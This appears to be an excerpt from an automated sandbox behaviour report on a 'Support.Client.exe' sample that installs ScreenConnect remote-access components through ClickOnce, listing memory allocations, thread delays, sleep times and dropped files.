                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: 2513E810000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: 251583C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeMemory allocated: F20000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeMemory allocated: 1AE80000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeMemory allocated: 12B0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeMemory allocated: 2E50000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeMemory allocated: 12B0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeMemory allocated: 1B10000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeMemory allocated: 1CF0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeMemory allocated: 3CF0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeMemory allocated: 10E0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeMemory allocated: 1AAB0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599874Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599765Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599653Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599540Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599413Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599302Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599185Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599017Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598849Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598625Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598265Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597991Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597872Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597763Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597655Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597544Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597422Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597297Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597187Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597078Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596969Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596844Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596734Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596624Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596503Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596375Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596265Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596156Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596046Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595936Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595824Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595679Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595552Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595375Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595249Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595015Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594905Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594794Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594452Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594328Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594218Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594108Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593984Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593874Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593760Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593655Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593531Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593421Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593312Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593202Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593092Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 2611Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 6912Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Support.Client.exe TID: 7572Thread sleep time: -40000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -34126476536362649s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -599874s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -599765s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -599653s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -599540s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -599413s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -599302s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -599185s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -599017s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -598849s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -598625s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -598265s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -597991s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -597872s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -597763s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -597655s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -597544s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -597422s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -597297s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -597187s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -597078s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -596969s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -596844s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -596734s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -596624s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -596503s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -596375s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -596265s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -596156s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -596046s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -595936s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -595824s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -595679s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -595552s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -595375s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -595249s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -595125s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -595015s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -594905s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -594794s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -594687s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -594562s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -594452s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -594328s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -594218s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -594108s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -593984s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -593874s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -593760s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -593655s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -593531s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -593421s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -593312s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -593202s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7644Thread sleep time: -593092s >= -30000sJump to behavior
                  Source: C:\Windows\System32\svchost.exe TID: 7832Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe TID: 1908Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exe TID: 4588Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                  Source: C:\Users\user\Desktop\Support.Client.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\Support.Client.exeThread delayed: delay time: 40000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599874Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599765Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599653Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599540Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599413Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599302Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599185Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599017Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598849Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598625Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598265Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597991Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597872Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597763Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597655Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597544Jump to behavior
